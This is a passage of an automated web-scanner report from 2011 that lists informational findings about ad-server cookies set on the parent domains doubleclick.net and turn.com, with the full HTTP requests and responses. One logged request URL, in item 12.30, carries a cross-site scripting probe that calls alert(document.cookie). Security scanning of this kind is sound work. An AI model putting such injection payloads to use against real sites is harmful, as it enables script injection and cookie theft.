P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:32:29 GMT
Date: Mon, 13 Jun 2011 11:32:29 GMT
Expires: Mon, 13 Jun 2011 11:32:29 GMT
Cache-Control: private

document.write('<!-- Unicast Ad Platform V3.8.106 Delivery V3.0 Start: In-Page Script (Script) ad tag for\nAgency: [ Buzz-Media ]\nAdvertiser: [ Havaianas - Buzz Media ]\nCampaign: [ MYOH ]\nPublisher
...[SNIP]...

12.28. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.mtv/ent_010111

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c78d0c338000059||t=1307964234|et=730|cs=tfarooo8; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:54 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/cm.mtv/ent_010111;net=cm;u=,cm-10119788822_1307963916,120221f8320d7dc,music,ax.180-ak.a-cm.tech_l-cm.cm_xpd5_rtg-dx.13-dx.1-dx.10-dx.12-dx.22-dx.31-dx.34-dx.36-dx.40-dx.bh-dx.bj-dx.bn-dx.bo-dx.bs-wfm.hliv_h-wfm.health_l-idgt.telco_l-bz.25;;cmw=owl;sz=728x90;net=cm;env=ifr;ord1=388700;contx=music;an=180;dc=w;btg=ak.a;btg=cm.tech_l;btg=cm.cm_xpd5_rtg;btg=dx.13;btg=dx.1;btg=dx.10;btg=dx.12;btg=dx.22;btg=dx.31;btg=dx.34;btg=dx.36;btg=dx.40;btg=dx.bh;btg=dx.bj;btg=dx.bn;btg=dx.bo;btg=dx.bs;btg=wfm.hliv_h;btg=wfm.health_l;btg=idgt.telco_l;btg=bz.25;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 586
Set-Cookie: id=c78d0c338000059||t=1307964234|et=730|cs=tfarooo8; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:54 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:54 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:23:54 GMT
Expires: Mon, 13 Jun 2011 11:23:54 GMT

document.write('\n<script language=\"JavaScript\" src=\"http://a.collective-media.net/adj/collectivemedia/innova/healthyliving;adv=inhl;sz=728x90;ord=7269388?\" type=\"text/javascr
...[SNIP]...

12.29. http://ad.doubleclick.net/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c36cbc3380000b3||t=1307964171|et=730|cs=l3cprfmy; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:22:51 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:22:51 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/mtv.mtvi/atf_j_s/blog/mvb/_2011/_06/_12/game_of_thrones_spoiler;sec0=blog;sec1=mvb;sec2=_2011;sec3=_06;sec4=_12;sec5=game_of_thrones_spoiler_death_sean_bean;bcat=poll;bcat=reviews;bcat=tv;btag=game-of-thrones;!category=expand;!category=blog;!category=poll;!category=reviews;!category=tv;!category=game-of-thrones;pos=atf;mtype=standard;sz=6x6;tile=1;u=bcat-poll%7Cbcat-reviews%7Cbcat-tv%7Cbtag-game-of-thrones%7C!category-expand%7C!category-blog%7C!category-poll%7C!category-reviews%7C!category-tv%7C!category-game-of-thrones%7Cpos-atf%7Cmtype-standard%7Csz-6x6%7Ctile-1;ord=329849423211999200? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 500
Set-Cookie: id=c36cbc3380000b3||t=1307964171|et=730|cs=l3cprfmy; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:22:51 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:22:51 GMT
Date: Mon, 13 Jun 2011 11:22:51 GMT
Expires: Mon, 13 Jun 2011 11:22:51 GMT
Cache-Control: private, max-age=300

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/t;25173648;0-0;0;65346782;490-6/6;41776462/41794249/1;u=bcat-poll|bcat-reviews|bcat-tv|btag-game-of-thrones|!ca
...[SNIP]...

12.30. http://ad.doubleclick.net/adj/oiq.rmx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/oiq.rmx/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c12c6c3380000b0||t=1307963994|et=730|cs=zzlowqsy; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:19:54 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:19:54 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/oiq.rmx/;click0=http://ad.yieldmanager.com/clk?2,13%3Becb025846c58424b%3B13088ae1ef6,0%3B%3B%3B4270644083,mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAA9R6uiDABAAAAAAAAADI0NjFiNzE2LTk1YWQtMTFlMC1hMjVlLWUzNmM1YTM3NjJiYQAAAAAAAAA=,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,;otp=16777;tile=1;sz=728x90;u=rmxli_3163700|surl_http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?mTsCACJqCwC3E5MAAAAAADPOJAAAAAAAAgAAAAYAAAAAAP8AAAACB4FnFAAAAAAAuowIAAAAAAA0RjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADx4gUAAAAAAAIAAwAAAAAAUrgeheuRCECamZmZmZkKQM8tcer33BlAAAAAAAAAHEDQLXHq99wZQAAAAAAAABxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACOmofmodM-CgUplvRSzdlkmEMRVc6kOd6J3c5dAAAAAA==,,http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%22-alert%28document.cookie%29-%225958ea17fd2%3D1,Z%3D728x90%26_salt%3D1188639314%26anmember%3D514%26anprice%3D220%26r%3D1%26s%3D748066,2461b716-95ad-11e0-a25e-e36c5a3762ba
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1900
Set-Cookie: id=c12c6c3380000b0||t=1307963994|et=730|cs=zzlowqsy; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:19:54 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:19:54 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:19:54 GMT
Expires: Mon, 13 Jun 2011 11:19:54 GMT

document.write('<script type=\"text/javascript\"\nsrc=\"http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1?mpt=7029106&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/17/1e8/%2a/n%3B241904200%
...[SNIP]...

12.31. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cc8d5c338000050|2588783/933076/15138|t=1307964404|et=730|cs=wbm9vkwb; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:44 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click;h=v8/3b25/4/64f/%2a/k;241004352;1-0;0;62740535;3454-728/90;42550474/42568261/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
Set-Cookie: id=cc8d5c338000050|2588783/933076/15138|t=1307964404|et=730|cs=wbm9vkwb; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:26:44 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:26:44 GMT
Date: Mon, 13 Jun 2011 11:26:45 GMT
Server: GFE/2.0
Content-Type: text/html

12.32. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
adImpCount=Cwq2GXGZMei0H6QRLFUWcgEzref2sQrvavFxeBByhwbG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6fVMpRA9COvxPm9GhrTVpFEJedvFh7IcKMPUZKG4a25Wjp4-4VHiVBWhL8kZTTHUEEZYjqWmNkbYMJXxYwXP0ivAhMyG7WiBdMtmZpxmib65elynrVX8L3tctyWPQ981dRhSgyH_YKyzwaHs2OOwPKnlcd_rDI1guq3jW_XwqTcptUMsF14GuE97T3OQgmtAND1aJVVaBwrOt4alj6Rzt3asNA2mupPotO89J1M7GQCdYA6mZQORv9NCOuHD8W8Pvw2E0XpC8MoXcUC9EvLIqDJ81dnOBqEIp9UcyJdU0s2dZNadKv1nmwVh0nQMBiUozDyDUfzSD4FrO8H9TmnOs2Fy1WnPRG1FVm_158R84SQUDDvn5qzXJjLZ8wMOpH2VUidMby9e0xx7EjmD_qe07bBW51WNe_vXSrH8j3OikfOix0YnsBLVPpvnCKqaSleld2e3m3LW2izkTUCvyig6f_Eclre2oYPrXXUlbckOsOzfRHfKboHgAiyeCSD5Se3Dt56JQiT9BBtDU5zYNi_NmUreJTf9EU_tOkHRKVO8_mZbQn_ugqOPPFtBuaLGREhiwAxwF5V3jVoK_k0gd7-0t-3eGamYwoDBKdRj9ba9srGKI4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIVYDsGs8HA9ebgXcdSEZwfKe3Y57IiZneII5Ka6gzHwRfJJa1hX06djW9VmjlVrjyXySWtYV9OnY1vVZo5Va48l8klrWFfTp2Nb1WaOVWuPLF4I5dA1vXKb0IGHGC-Ole5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4iS8drDvH2GHnX7T1P8D_iX1ra1gA5Wy-ov38a7zRUR_Fn3VEss7RQ9Tyo1qT5AwESaWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
fc=GNnbBD3qiHnaSVYBbCSNLvLBUhuH6wslcqkNHBZUaKb7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rS1aeprWaIP6vaZTV9xdfPWhdQ9SbRVPlctyZfmBFwploXR8qslufNm6r8H5hh1jnufuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xNve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70y